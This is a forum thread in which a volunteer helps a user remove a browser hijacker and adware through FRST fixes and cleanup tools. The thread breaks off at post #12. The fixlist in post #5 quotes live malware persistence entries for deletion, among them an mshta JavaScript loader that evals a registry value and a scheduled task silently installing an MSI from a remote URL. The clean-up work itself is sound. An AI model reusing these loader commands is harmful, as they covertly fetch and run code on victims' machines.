
Trotux Browser Hijacker and "Custom" Google Search redirect infecting Chrome!


This topic is locked. 33 replies to this topic.

#1 stipess

Posted 09 March 2017 - 04:07 PM

So I downloaded a program and started installing it, and while it was installing, a bunch of random cmd windows opened and closed, billions of Chrome pages opened with random websites, and programs started downloading and running themselves. When I opened Task Manager, I saw 3 - 5 suspicious programs running that I currently stopped, but I don't know what they do and how to remove them. Currently the visible damage done is the fact that every time I open Chrome, instead of the Google page, this one opens - 

 

http://imgur.com/i95uc6A

 

Even after running the Chrome cleanup tool and uninstalling suspicious programs, it's still happening. On top of that, every time I search something, my Google search gets redirected to this - 

 

http://imgur.com/Qm4sZH1

 

Some sort of "Custom" google search.

 

I have attached FRST and Addition files.


#2 Slurppa (Malware Study Hall Senior)

Posted 09 March 2017 - 04:29 PM

Hi stipess, and welcome to Bleeping Computer! :)
My name is Slurppa and I will be handling your log(s) to help you get cleaned up. Please give me some time to look it over and I will get back to you as soon as possible.

 
 
Please familiarize yourself with the following guidelines:
  • Complete all the steps in their given order.
  • Update me about the current state of your computer.
  • If you have any problems or questions, please let me know. If you are unsure how to continue, please let me know.
  • Do not run any other fixes/programs that I have not instructed.
  • Copy and paste all logs into your post directly unless otherwise instructed. Don't attach logs.
  • Lack of symptoms does not mean the computer is clean. Please stick with me until I give you green light.

Member of the Bleeping Computer A.I.I. early response team!


#3 stipess (Topic Starter)

Posted 09 March 2017 - 05:52 PM

UPDATE - 

 

I found this on my programs and features - 

http://prntscr.com/ei1ux0

 

When I click uninstall, nothing happens and it stays there.

 

Also, random programs start running in the background ruining performance.



#4 stipess (Topic Starter)

Posted 10 March 2017 - 10:53 AM

UPDATE - 

 

On start up, random programs were installed with suspicious names.



#5 Slurppa (Malware Study Hall Senior)

Posted 10 March 2017 - 02:09 PM

Hello stipess,

Sorry for delay. Please follow steps below

Going over your logs I noticed that you have qbittorrent installed.
  • Avoid gaming sites, pirated software, cracking tools, keygens, and peer-to-peer (P2P) file sharing programs, as this is by far the most likely reason you were infected!
  • Files that are downloaded from these websites are most likely infected, and even though they may appear to be what you wanted, they may infect your computer at the same time! Do not download files from your P2P client, and if you do, always scan the files with your anti-virus before executing them!
  • Websites that contain links to downloads are also highly likely to try and infect your computer! Please avoid them as much as possible, and if pop-up boxes appear, always try to close them by clicking the cross at the top right of the window or terminating the browser!
  • The best way to eliminate the risk of infection from P2P applications is to avoid these types of web sites and not use any P2P applications.
  • It is pretty much certain that if you continue to use P2P programs, you will get infected again.
I would recommend that you uninstall qbittorrent; however, that choice is up to you. If you choose to remove it, you can do so via Start > Control Panel > Add/Remove Programs.
If you wish to keep it, please do not use it, and remove all files downloaded with it until your computer is cleaned! After your computer is cleaned, please Practice Safe Internet and always scan downloaded files with an anti-virus before executing them to minimize risk!

==================================================

We need to run a fix with FRST:
  • Please copy and paste the fix I have placed below into a text file and save it to the same location as FRST with the name fixlist.txt

    CreateRestorePoint:
    EmptyTemp:
    CloseProcesses:

    HKU\S-1-5-21-1470955676-2541670205-3054890337-1001\Software\Microsoft\Internet Explorer\Main,Search Page = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBRGNclVS1AC6sNoHHpIW6d8_7JZJK7XqnGlhvkTgn1Pcghv4ifTIFJHPWvWXyuNexfhHVpLUoPd3hie_sxzO8S0ZnuQAoQHjUaMHiC2C-NhVHBb6Q469LO-6q-wqPPATdbuKghombOLiJpxGxqz7-Y4mfdmYclRaQY8h4VFFwrxKkKtczEjiIZjQ,,&q={searchTerms}
    HKU\S-1-5-21-1470955676-2541670205-3054890337-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://%66%65%65%64.%68%65%6C%70%65%72%62%61%72.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBRGNclVS1AC6sNoHHpIW6d8_7JZJK7XqnGlhvkTgn1Pcghv4ifTIFJHPWvWXyuNexfhHVpLUoPd3hie_sxzO8S0ZnuQAoc1osCrFj1Wep2VoXMiKYlqJhirBb2BmxJckKvT9ZnbJ1F3S3Ny_mj_9-Hg_W76Iqhmyt-iUOYM8qCCigSs1pd0pZGUg,,
    SearchScopes: HKLM-x32 -> DefaultScope {ielnksrch} URL =
    SearchScopes: HKLM-x32 -> ielnksrch URL = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBRGNclVS1AC6sNoHHpIW6d8_7JZJK7XqnGlhvkTgn1Pcghv4ifTIFJHPWvWXyuNexfhHVpLUoPd3hie_sxzO8S0ZnuQAoQHjUaMHiC2C-NhVHBb6Q469LO-6q-wqPPATdbuKghombOLiJpxGxqz7-Y4mfdmYclRaQY8h4VFFwrxKkKtczEjiIZjQ,,&q={searchTerms}
    SearchScopes: HKU\S-1-5-21-1470955676-2541670205-3054890337-1001 -> DefaultScope {ielnksrch} URL = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBRGNclVS1AC6sNoHHpIW6d8_7JZJK7XqnGlhvkTgn1Pcghv4ifTIFJHPWvWXyuNexfhHVpLUoPd3hie_sxzO8S0ZnuQAoQHjUaMHiC2C-NhVHBb6Q469LO-6q-wqPPATdbuKghombOLiJpxGxqz7-Y4mfdmYclRaQY8h4VFFwrxKkKtczEjiIZjQ,,&q={searchTerms}
    SearchScopes: HKU\S-1-5-21-1470955676-2541670205-3054890337-1001 -> {ielnksrch} URL = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBRGNclVS1AC6sNoHHpIW6d8_7JZJK7XqnGlhvkTgn1Pcghv4ifTIFJHPWvWXyuNexfhHVpLUoPd3hie_sxzO8S0ZnuQAoQHjUaMHiC2C-NhVHBb6Q469LO-6q-wqPPATdbuKghombOLiJpxGxqz7-Y4mfdmYclRaQY8h4VFFwrxKkKtczEjiIZjQ,,&q={searchTerms}
    CHR HomePage: Default -> hxxps://%66%65%65%64.%68%65%6C%70%65%72%62%61%72.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBRGNclVS1AC6sNoHHpIW6d8_7JZJK7XqnGlhvkTgn1Pcghv4ifTIFJHPWvWXyuNexfhHVpLUoPd3hie_sxzO8S0ZnuQAoQBT7kmVQ_IMHjWC_Lda5X1l0VcvTR4sV2_Mpt9TxCO0NR0pTWRtquCPFchNdziNCfFcN7bstFjFVNj2CasPLYp15GMA,,
    HKU\.DEFAULT\Software\Classes\37811d: "C:\Windows\system32\mshta.exe" "javascript:ia06ofqcP="4PXLrX7N";B1J8=new ActiveXObject("WScript.Shell");L7tBm7TBX="q";E8jkX=B1J8.RegRead("HKCU\\software\\wmfrputk\\etnknunoe");rgEO2R7W="jjB";eval(E8jkX);NCFe4Xhs="PV24C";" <===== ATTENTION
    Task: {113A5FB2-E6BC-45E1-A323-63E6C1405B5D} - System32\Tasks\Online Application => C:\Program Files (x86)\Microleaves\Online.io Application\Online-Guardian.exe <==== ATTENTION
    Task: {158F56AC-8DCA-4447-8122-353A62B3606D} - System32\Tasks\Online Application v2 Guard => C:\Program Files (x86)\Microleaves\Online.io Application\OnlineGuardian-v2.exe <==== ATTENTION
    Task: {77CA69CD-2EC1-4EAD-912D-DEA93BE7F49A} - System32\Tasks\Online Application v2 Guardian => C:\Program Files (x86)\Microleaves\Online.io Application\OnlineGuardian-v2.exe <==== ATTENTION
    Task: {77F34F71-0850-4250-A427-2E2C767E093B} - System32\Tasks\Online Application Guard => C:\Program Files (x86)\Microleaves\Online.io Application\Online-Guardian.exe <==== ATTENTION
    Task: {446758C0-B5C1-4D0E-A81B-61D800835873} - System32\Tasks\Online Application v2 => C:\Program Files (x86)\Microleaves\Online.io Application\OnlineGuardian-v2.exe <==== ATTENTION
    Task: {5F098099-AE34-41D7-B91A-B629AAFF4D24} - System32\Tasks\Online Application v209 Guardian => C:\Program Files (x86)\Microleaves\Online.io Application\Online-Guardian-v2.0.9.exe <==== ATTENTION
    ShellExecuteHooks: No Name - {A3B75268-0389-11E7-BBCC-64006A5CFC23} - C:\Users\stipe\AppData\Roaming\Vuneing\Ritydreversh.dll [144896 2017-03-09] ()
    HKLM\...\Policies\Explorer: [EnableShellExecuteHooks] 1
    2017-03-09 21:04 - 2017-03-09 21:04 - 00093962 _____ C:\Users\stipe\Desktop\cc_20170309_210447.reg
    2017-03-09 20:58 - 2017-03-09 20:58 - 00016848 _____ C:\Windows\System32\Tasks\2564R4525R6298x4556-dll
    2017-03-09 20:50 - 2017-03-09 20:50 - 00003734 _____ C:\Windows\System32\Tasks\{26474B21-8F86-490C-859C-F4966862DDFB}
    2017-03-09 20:49 - 2017-03-09 20:49 - 00016840 _____ C:\Windows\System32\Tasks\2564R4525R6298x4556
    2017-03-09 20:49 - 2017-03-09 20:49 - 00006182 _____ C:\Windows\System32\Tasks\Werbering Configuration
    2017-03-09 20:49 - 2017-03-09 20:49 - 00000000 ____D C:\Users\stipe\AppData\Roaming\Vuneing
    2017-03-09 20:49 - 2017-03-09 20:49 - 00000000 ____D C:\Users\stipe\AppData\Roaming\IObit
    2017-03-09 20:49 - 2017-03-09 20:49 - 00000000 ____D C:\Users\stipe\AppData\Local\Qaqisy
    2017-03-09 20:49 - 2017-03-09 20:49 - 00000000 ____D C:\Program Files (x86)\Werbering Configuration
    2017-03-09 20:49 - 2017-03-09 20:49 - 00000000 ____D C:\Program Files (x86)\IObit
    2017-03-09 20:49 - 2017-03-09 20:49 - 00000000 ____D C:\Program Files (x86)\Arucerycerqsh
    2017-03-09 20:48 - 2017-03-09 20:49 - 00005124 _____ C:\Windows\System32\Tasks\Vasagohok
    2017-03-09 20:48 - 2017-03-09 20:48 - 01962408 _____ C:\Users\stipe\Downloads\78682033114.exe
    2017-03-09 20:47 - 2017-03-09 20:48 - 00000000 ____D C:\Users\stipe\AppData\Roaming\gplyra
    2017-03-09 20:46 - 2017-03-09 20:46 - 07288832 _____ C:\Users\stipe\AppData\Roaming\agent.dat
    2017-03-09 20:46 - 2017-03-09 20:46 - 01938537 _____ C:\Users\stipe\AppData\Roaming\StrongKayron.bin
    2017-03-09 20:46 - 2017-03-09 20:46 - 01891618 _____ C:\Users\stipe\AppData\Roaming\SingDax.tst
    2017-03-09 20:46 - 2017-03-09 20:46 - 00126464 _____ C:\Users\stipe\AppData\Roaming\noah.dat
    2017-03-09 20:46 - 2017-03-09 20:46 - 00126464 _____ C:\Users\stipe\AppData\Roaming\lobby.dat
    2017-03-09 20:46 - 2017-03-09 20:46 - 00072787 _____ C:\Users\stipe\AppData\Roaming\Qvofind.tst
    2017-03-09 20:46 - 2017-03-09 20:46 - 00070752 _____ C:\Users\stipe\AppData\Roaming\Config.xml
    2017-03-09 20:46 - 2017-03-09 20:46 - 00054272 _____ C:\Users\stipe\AppData\Roaming\ApplicationHosting.dat
    2017-03-09 20:46 - 2017-03-09 20:46 - 00018432 _____ C:\Users\stipe\AppData\Roaming\Main.dat
    2017-03-09 20:46 - 2017-03-09 20:46 - 00005568 _____ C:\Users\stipe\AppData\Roaming\md.xml
    2017-03-09 20:46 - 2017-03-09 20:46 - 00003722 _____ C:\Windows\System32\Tasks\Online Application Guardian
    2017-03-09 20:46 - 2017-03-09 20:46 - 00003716 _____ C:\Windows\System32\Tasks\Online Application Guard
    2017-03-09 20:46 - 2017-03-09 20:46 - 00003708 _____ C:\Windows\System32\Tasks\Traffic Exchange Guardian
    2017-03-09 20:46 - 2017-03-09 20:46 - 00003704 _____ C:\Windows\System32\Tasks\Online Application
    2017-03-09 20:46 - 2017-03-09 20:46 - 00003702 _____ C:\Windows\System32\Tasks\Traffic Exchange Guard
    2017-03-09 20:46 - 2017-03-09 20:46 - 00003690 _____ C:\Windows\System32\Tasks\Traffic Exchange
    2017-03-09 20:46 - 2017-03-09 20:46 - 00003314 _____ C:\Windows\System32\Tasks\Online Application Updater
    2017-03-09 20:46 - 2017-03-09 20:46 - 00003294 _____ C:\Windows\System32\Tasks\Traffic Exchange Updater
    2017-03-09 20:46 - 2017-03-09 20:46 - 00003280 _____ C:\Windows\System32\Tasks\Online Application v209 Guardian
    2017-03-09 20:46 - 2017-03-09 20:46 - 00003274 _____ C:\Windows\System32\Tasks\Online Application v209 Guard
    2017-03-09 20:46 - 2017-03-09 20:46 - 00003266 _____ C:\Windows\System32\Tasks\Online Application v2 Guardian
    2017-03-09 20:46 - 2017-03-09 20:46 - 00003262 _____ C:\Windows\System32\Tasks\Online Application v209
    2017-03-09 20:46 - 2017-03-09 20:46 - 00003260 _____ C:\Windows\System32\Tasks\Online Application v2 Guard
    2017-03-09 20:46 - 2017-03-09 20:46 - 00003256 _____ C:\Windows\System32\Tasks\Traffic Exchange v209 - 3
    2017-03-09 20:46 - 2017-03-09 20:46 - 00003256 _____ C:\Windows\System32\Tasks\Traffic Exchange v209 - 2
    2017-03-09 20:46 - 2017-03-09 20:46 - 00003256 _____ C:\Windows\System32\Tasks\Traffic Exchange v209 - 1
    2017-03-09 20:46 - 2017-03-09 20:46 - 00003248 _____ C:\Windows\System32\Tasks\Online Application v2
    2017-03-09 20:46 - 2017-03-09 20:46 - 00003242 _____ C:\Windows\System32\Tasks\Traffic Exchange v2 - 3
    2017-03-09 20:46 - 2017-03-09 20:46 - 00003242 _____ C:\Windows\System32\Tasks\Traffic Exchange v2 - 2
    2017-03-09 20:46 - 2017-03-09 20:46 - 00003242 _____ C:\Windows\System32\Tasks\Traffic Exchange v2 - 1
    2017-03-09 20:46 - 2017-03-09 20:46 - 00003120 _____ C:\Windows\System32\Tasks\hostTask
    2017-03-09 20:46 - 2017-03-09 20:46 - 00000420 _____ C:\Windows\Tasks\Online Application Updater.job
    2017-03-09 20:46 - 2017-03-09 20:46 - 00000406 ____H C:\Windows\Tasks\Traffic Exchange Updater.job
    2017-03-09 20:46 - 2017-03-09 20:46 - 00000374 _____ C:\Windows\Tasks\Online Application v209.job
    2017-03-09 20:46 - 2017-03-09 20:46 - 00000374 _____ C:\Windows\Tasks\Online Application v209 Guardian.job
    2017-03-09 20:46 - 2017-03-09 20:46 - 00000374 _____ C:\Windows\Tasks\Online Application v209 Guard.job
    2017-03-09 20:46 - 2017-03-09 20:46 - 00000364 _____ C:\Windows\Tasks\Traffic Exchange v209 - 3.job
    2017-03-09 20:46 - 2017-03-09 20:46 - 00000364 _____ C:\Windows\Tasks\Traffic Exchange v209 - 2.job
    2017-03-09 20:46 - 2017-03-09 20:46 - 00000364 _____ C:\Windows\Tasks\Traffic Exchange v209 - 1.job
    2017-03-09 20:46 - 2017-03-09 20:46 - 00000364 _____ C:\Windows\Tasks\Online Application v2.job
    2017-03-09 20:46 - 2017-03-09 20:46 - 00000364 _____ C:\Windows\Tasks\Online Application v2 Guardian.job
    2017-03-09 20:46 - 2017-03-09 20:46 - 00000364 _____ C:\Windows\Tasks\Online Application v2 Guard.job
    2017-03-09 20:46 - 2017-03-09 20:46 - 00000354 _____ C:\Windows\Tasks\Traffic Exchange v2 - 3.job
    2017-03-09 20:46 - 2017-03-09 20:46 - 00000354 _____ C:\Windows\Tasks\Traffic Exchange v2 - 2.job
    2017-03-09 20:46 - 2017-03-09 20:46 - 00000354 _____ C:\Windows\Tasks\Traffic Exchange v2 - 1.job
    2017-03-09 20:46 - 2017-03-09 20:43 - 01125376 _____ C:\Users\stipe\AppData\Roaming\SingDax.exe
    2017-03-09 20:46 - 2017-03-09 20:43 - 01125376 _____ C:\Users\stipe\AppData\Roaming\Qvofind.exe
    2017-03-09 20:45 - 2017-03-09 20:46 - 00016560 _____ C:\Users\stipe\AppData\Roaming\InstallationConfiguration.xml
    2017-03-09 20:45 - 2017-03-09 20:46 - 00000000 ____D C:\Users\Default\AppData\Local\AdvinstAnalytics
    2017-03-09 20:45 - 2017-03-09 20:45 - 00140288 _____ C:\Users\stipe\AppData\Roaming\Installer.dat
    2017-03-09 20:43 - 2017-03-09 20:47 - 00000000 ____D C:\Users\stipe\AppData\Roaming\Microleaves
    Task: {0F2871D3-C709-4A24-9DF2-3BDB54C95277} - System32\Tasks\Vasagohok => "msiexec" /i hxxp://d2buh1bf1g584w.cloudfront.net/msi/rel.php?u=WDCXWD10EZEX-00KUWA0_WD-WCC1S574483344833&v=201739 /q
    Task: {2CD1F7D7-D83F-4F07-BDD3-60C9A0B9EEAC} - System32\Tasks\AppDataUpdater => C:\windows\adsvr.exe [2017-02-27] ()
    C:\windows\adsvr.exe
    Task: {367557C9-2816-49FB-AB00-A2B70FAFAAF1} - System32\Tasks\Microsoft\Windows\Media Center\VCore => C:\\ProgramData\\vCore\\VCore.exe [2017-03-06] () <==== ATTENTION
    C:\\ProgramData\\vCore\\VCore.exe
    Task: {75B469B6-CAE1-433E-BD1C-BD4BA0F83125} - System32\Tasks\Traffic Exchange Guardian => C:\Program Files (x86)\Microleaves\Traffic Exchange\Online-Guardian.exe <==== ATTENTION
    Task: {78933AC5-3AE2-4CBE-9451-40B222B9CBAB} - System32\Tasks\Traffic Exchange v2 - 1 => C:\Program Files (x86)\Microleaves\Traffic Exchange\OnlineGuardian-v2.exe <==== ATTENTION
    Task: {9BCEF8A6-957E-46FD-8158-2FF162A0B12F} - System32\Tasks\Traffic Exchange v2 - 3 => C:\Program Files (x86)\Microleaves\Traffic Exchange\OnlineGuardian-v2.exe <==== ATTENTION
    Task: {9F10326A-2137-4302-937A-0F48F673CB3D} - System32\Tasks\Traffic Exchange => C:\Program Files (x86)\Microleaves\Traffic Exchange\Online-Guardian.exe <==== ATTENTION
    Task: {A40A18EE-765B-40F9-9298-1DE7FADEB928} - System32\Tasks\Traffic Exchange v209 - 1 => C:\Program Files (x86)\Microleaves\Traffic Exchange\Online-Guardian-v2.0.9.exe <==== ATTENTION
    Task: {A8778D09-71DA-4AA9-AF7F-A80FDF8C5B0D} - System32\Tasks\Traffic Exchange v209 - 3 => C:\Program Files (x86)\Microleaves\Traffic Exchange\Online-Guardian-v2.0.9.exe <==== ATTENTION
    Task: {DC0A9146-CE93-4F00-8A0F-03E3A7B2B61F} - System32\Tasks\Traffic Exchange Updater => C:\Program Files (x86)\Microleaves\Traffic Exchange\Traffic Exchange Updater.exe <==== ATTENTION
    Task: {E709374B-0FF2-43FD-BBE5-1D13DD140736} - System32\Tasks\Traffic Exchange Guard => C:\Program Files (x86)\Microleaves\Traffic Exchange\Online-Guardian.exe <==== ATTENTION
    Task: {F494A980-7C8F-4A41-91DC-A28FDBFAE75B} - System32\Tasks\Traffic Exchange v209 - 2 => C:\Program Files (x86)\Microleaves\Traffic Exchange\Online-Guardian-v2.0.9.exe <==== ATTENTION
    Task: {C6F0AC99-6A8F-410F-B62D-FB4F010A2309} - System32\Tasks\Traffic Exchange v2 - 2 => C:\Program Files (x86)\Microleaves\Traffic Exchange\OnlineGuardian-v2.exe <==== ATTENTION
    R2 ReimageRealTimeProtector; C:\Program Files\Reimage\Reimage Protector\ReiGuard.exe [8061808 2017-01-19] (Reimage®)
    2017-03-06 10:31 - 2017-03-06 10:31 - 00003548 _____ C:\Windows\System32\Tasks\Reimage Reminder
    2017-03-06 10:30 - 2017-03-06 10:30 - 00004352 _____ C:\Windows\System32\Tasks\ReimageUpdater
    2017-03-06 10:30 - 2017-03-06 10:30 - 00001984 _____ C:\Users\Public\Desktop\PC Scan & Repair by Reimage.lnk
    2017-03-06 10:29 - 2017-03-06 10:31 - 00000140 _____ C:\Windows\Reimage.ini
    2017-03-06 10:29 - 2017-03-06 10:31 - 00000000 ____D C:\rei
    2017-03-06 10:29 - 2017-03-06 10:30 - 00604928 _____ (Reimage) C:\Users\stipe\Downloads\ReimageRepair (1).exe
    2017-03-06 10:29 - 2017-03-06 10:30 - 00000000 ____D C:\Program Files\Reimage
    2017-03-06 10:28 - 2017-03-06 10:29 - 00604928 _____ (Reimage) C:\Users\stipe\Downloads\ReimageRepair.exe
    Task: {7BA5C1C0-E332-47C3-BB3E-4F818863E093} - System32\Tasks\ReimageUpdater => C:\Program Files\Reimage\Reimage Protector\ReiGuard.exe [2017-01-19] (Reimage®) <==== ATTENTION
    Task: {7D037AAF-B5E0-470A-96DA-4A4207554559} - System32\Tasks\Reimage Reminder => C:\Program Files\Reimage\Reimage Repair\ReimageReminder.exe [2016-11-13] (Reimage ltd.) <==== ATTENTION
    HKLM\...\Run: [gplyra] => C:\Users\stipe\AppData\Roaming\gplyra\gplyra\start.cmd [216 2017-01-10] ()
    2017-02-17 09:19 - 2016-12-13 02:47 - 00000000 ____D C:\Users\stipe\Desktop\DriverEasy.Pro.5.1.5.5598
    2017-02-17 08:26 - 2017-02-17 08:50 - 00000438 _____ C:\Windows\Tasks\Driver Easy Scheduled Scan.job
    2017-02-17 08:26 - 2017-02-17 08:26 - 00003912 _____ C:\Windows\System32\Tasks\Driver Easy Scheduled Scan
    2017-02-17 08:26 - 2017-02-17 08:26 - 00001012 _____ C:\Users\Public\Desktop\Driver Easy.lnk
    2017-02-17 08:25 - 2017-02-17 08:26 - 03893424 _____ (Easeware ) C:\Users\stipe\Downloads\DriverEasy_Setup.exe
    Task: {F175CBB6-9AF3-4273-8D77-56CDC1C84E7B} - System32\Tasks\Driver Easy Scheduled Scan => C:\Program Files\Easeware\DriverEasy\DriverEasy.exe [2017-01-13] (Easeware)
    Task: C:\Windows\Tasks\Driver Easy Scheduled Scan.job => C:\Program Files\Easeware\DriverEasy\DriverEasy.exe
    FirewallRules: [{EE0F0A74-9FC5-4C80-9518-52A9EBF17A5B}] => (Allow) C:\Program Files\Easeware\DriverEasy\DriverEasy.exe
    C:\Program Files\Easeware
    HKLM-x32\...\Run: [chromebrowser] => C:\Windows\chromebrowser.exe [2751336 2017-03-09] () <===== ATTENTION
    HKLM\...\RunOnce: [DESKTOP-SBND6RH] => C:\Users\stipe\AppData\Local\Temp\g881A.tmp.exe [249344 2017-03-09] () <===== ATTENTION
    HKU\S-1-5-18\...\Run: [] => [X]
    AppInit_DLLs: C:\ProgramData\Hotfresh\Nimlex.dll => No File
    AppInit_DLLs-x32: C:\ProgramData\Hotfresh\Kineco.dll => No File
    S2 CloudPrinter; C:\ProgramData\\CloudPrinter\\CloudPrinter.exe [1125376 2017-03-09] () [File not signed]
    S2 PrefersSecure; C:\ProgramData\PrefersSecure\Nettrans.exe [44544 2017-03-02] () [File not signed]
    C:\ProgramData\\CloudPrinter
    C:\ProgramData\PrefersSecure
    2017-03-09 21:04 - 2017-03-09 21:04 - 00093962 _____ C:\Users\stipe\Desktop\cc_20170309_210447.reg
    2017-03-09 20:43 - 2017-03-09 20:43 - 02751336 _____ C:\Windows\chromebrowser.exe
    2017-03-05 16:00 - 2017-03-05 16:00 - 00000000 ____D C:\Users\stipe\AppData\LocalLow\Jujubee S_A_
    2017-03-05 14:33 - 2016-10-04 09:04 - 00000000 ____D C:\Users\stipe\Desktop\Reassembly.v19.09.2016
    2017-03-05 14:24 - 2017-03-05 14:25 - 111180508 _____ C:\Users\stipe\Downloads\Reassembly.v19.09.2016.rar
    2017-02-28 14:07 - 2017-02-28 14:07 - 00053759 _____ C:\Users\stipe\AppData\Roaming\Yoghourt.AooI
    2017-02-28 12:17 - 2017-02-28 12:17 - 00065536 _____ C:\Users\stipe\AppData\Roaming\eightsome.dll
    2017-02-28 09:24 - 2017-03-09 20:47 - 00002398 _____ C:\Windows\SysWOW64\findit.xml
    2017-02-28 09:23 - 2017-03-09 15:25 - 00000000 ____D C:\Users\stipe\AppData\Local\Icsoft
    2017-02-28 09:23 - 2017-03-05 05:18 - 00000000 ____D C:\Users\stipe\AppData\Local\YWPack
    2017-02-27 20:53 - 2017-02-27 20:53 - 00068066 _____ C:\Windows\adsvr.exe
    2017-02-27 20:53 - 2017-02-27 20:53 - 00003422 _____ C:\Windows\System32\Tasks\AppDataUpdater
    2017-02-28 12:17 - 2017-02-28 12:17 - 0065536 _____ () C:\Users\stipe\AppData\Roaming\eightsome.dll
    2017-03-09 20:46 - 2017-03-09 20:43 - 1125376 _____ () C:\Users\stipe\AppData\Roaming\Qvofind.exe
    2017-03-09 20:46 - 2017-03-09 20:46 - 0072787 _____ () C:\Users\stipe\AppData\Roaming\Qvofind.tst
    2017-03-09 20:46 - 2017-03-09 20:43 - 1125376 _____ () C:\Users\stipe\AppData\Roaming\SingDax.exe
    2017-03-09 20:46 - 2017-03-09 20:46 - 1891618 _____ () C:\Users\stipe\AppData\Roaming\SingDax.tst
    2017-03-09 20:46 - 2017-03-09 20:46 - 1938537 _____ () C:\Users\stipe\AppData\Roaming\StrongKayron.bin
    trotux - Uninstall (HKLM-x32\...\{773A4DAA-2970-4728-BF16-43941A803408}) (Version: - ) <==== ATTENTION
    Task: {B40BDFDB-BDCB-471C-B2A8-1F7099EEC70C} - System32\Tasks\2564R4525R6298x4556-dll => Rundll32.exe "C:\ProgramData\2564R4525R6298x4556\2564R4525R6298x4556.dll",Rxlezu
    Task: {837A61E3-8307-4184-A28F-CDEB676D90F0} - System32\Tasks\Werbering Configuration => C:\Program Files (x86)\Arucerycerqsh\xpurecult.exe [2017-03-09] (Glarysoft Ltd)
    Task: {26A7504A-C87F-44F6-9DAC-BB2AEEBFD678} - System32\Tasks\2564R4525R6298x4556 => Rundll32.exe "C:\ProgramData\2564R4525R6298x4556\2564R4525R6298x4556.dll",Rxlezu <==== ATTENTION
    Task: {17AB3858-3715-496B-A763-14D66A9E9A37} - System32\Tasks\hostTask => C:\ProgramData\CloudPrinter\tree.exe [2017-03-09] ()
    C:\ProgramData\2564R4525R6298x4556
    C:\Program Files (x86)\Arucerycerqsh

    Note: It's important that both files, FRST.exe/FRST64.exe and fixlist.txt are in the same location or the fix will not work
    NOTICE: This script was written specifically for this user, for use on that particular machine. Running this on another machine may cause damage to your operating system
  • Run FRST.exe/FRST64.exe and press the Fix button just once and wait
  • If for some reason the tool needs a restart, please make sure you let the system restart normally, then let the tool complete its run
  • When finished, FRST will generate a log (Fixlog.txt) in the same location the tool was run, please post it to your reply
Please include the FRST Fixlog.txt AND a new FRST log and Addition log in your next reply.
Since you have already run FRST once, you need to check the
Addition.txt checkbox before Scan in order to get the Addition log file!



#6 stipess (Topic Starter)

Posted 10 March 2017 - 02:37 PM

http://prntscr.com/eidy0s - that popped up on startup

 

However, this program is still running - http://prntscr.com/eie8fa , and when I try to delete it, it says it's being used and can't be removed even if I did end the task in task manager.

Edited by stipess, 10 March 2017 - 02:46 PM.


#7 Slurppa (Malware Study Hall Senior)

Posted 12 March 2017 - 03:58 AM

Hi stipess

I noticed that you have installed Reasoncore security product. Please refrain from doing system modification while we are working on your issue.

Fix deleted a lot of stuff but apparently there are some new ones now.

Are you using a pirated version of TechSmith software?
Pirated software and cracks/keygens are known to distribute malware and are therefore harmful to your system, and possibly to others by spreading the infection.
Be warned that many of our tools delete pirated software and cracks automatically. We do not help with the usage of pirated software. I will help you clean your computer now since it can spread the infection to other computers.
Please delete any pirated software and cracks/keygens from your computer before continuing.

====================================
Step 1:
CKScanner
  • Download CKScanner from here: http://downloads.malwareremoval.com/CKScanner.exe
  • Important - Save it to your desktop.
  • Right Click CKScanner.exe and "Run as administrator".
  • Give permission if necessary, and click Search For Files.
  • After a very short time, when the cursor hourglass disappears, click Save List To File.
  • A message box will verify the file saved. Please run the program once only.
  • Double-click the CKFiles.txt icon on your desktop and copy/paste the contents in your next reply.
====================================

Step 2:
We need to run a fix with FRST:
  • Please download the attached fixlist.txt file and save it to the same location as FRST
    Note: It's important that both files, FRST.exe/FRST64.exe and fixlist.txt are in the same location or the fix will not work
    NOTICE: This script was written specifically for this user, for use on that particular machine. Running this on another machine may cause damage to your operating system
    fixlist.txt (attached)
  • Run FRST.exe/FRST64.exe and press the Fix button just once and wait
  • If for some reason the tool needs a restart, please make sure you let the system restart normally, then let the tool complete its run
  • When finished, FRST will generate a log (Fixlog.txt) in the same location the tool was run, please post it to your reply
====================================

Step 3:
  • Please download AdwCleaner by Malwarebytes and save to your Desktop.
  • Double click on AdwCleaner.exe to run the tool.
    Vista/Windows 7/8/10 users right-click and select Run As Administrator
  • The tool will start to update the database if one is required.
  • Click on the Scan button.
  • AdwCleaner will begin...be patient as the scan may take some time to complete.
  • After the scan has finished, click on the Logfile button.
  • A window will open which lists the logs of your scans.
  • Click on the Scan tab.
  • Double-click the most recent scan which will be at the top of the list....the log will appear.
  • To open a Cleaning log, click on the Cleaning tab and double-click the log at the top of the list.
  • Copy and paste the contents of that logfile in your next reply.
  • A copy of all logfiles are saved to C:\AdwCleaner.
====================================

In your next reply post CKFiles.txt, Fixlog.txt, the AdwCleaner logs and new FRST & Addition.txt logs.
ATTENTION! Please select the Addition.txt AND Drivers MD5 checkboxes in FRST before scanning.



#8 stipess (Topic Starter)

Posted 12 March 2017 - 02:22 PM

I can't download fixlist.txt, apparently I don't have the permission - http://prntscr.com/ej44gg

 

Also, I have so much pirated software, it would be difficult to find it all and remove. You mentioned some of your tools do that?


Edited by stipess, 12 March 2017 - 02:26 PM.


#9 Slurppa (Malware Study Hall Senior)

Posted 12 March 2017 - 05:32 PM

Hi

 

Were you logged in when you tried to download the attachment?

 


Also, I have so much pirated software, it would be difficult to find it all and remove. You mentioned some of your tools do that?

 

I can try to help with that but first we gotta clean your computer.


Edited by Slurppa, 12 March 2017 - 05:38 PM.



#10 stipess (Topic Starter)

Posted 12 March 2017 - 09:32 PM

Yeah, I am logged in, but it's not allowing me to download it.



#11 stipess (Topic Starter)

Posted 13 March 2017 - 12:11 PM

Ok, so I tried logging out, logging in, but nothing worked, always this page pops up when I click on it - http://prntscr.com/ejhdlw

 

Can you upload the file on another website?



#12 Slurppa (Malware Study Hall Senior)

